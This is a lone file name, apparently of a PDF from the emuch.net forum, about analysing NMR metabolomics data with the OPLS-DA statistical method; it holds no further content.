emuch.net]Analysing_NMR_metabolomics_data_using_OPLS-DA.pdf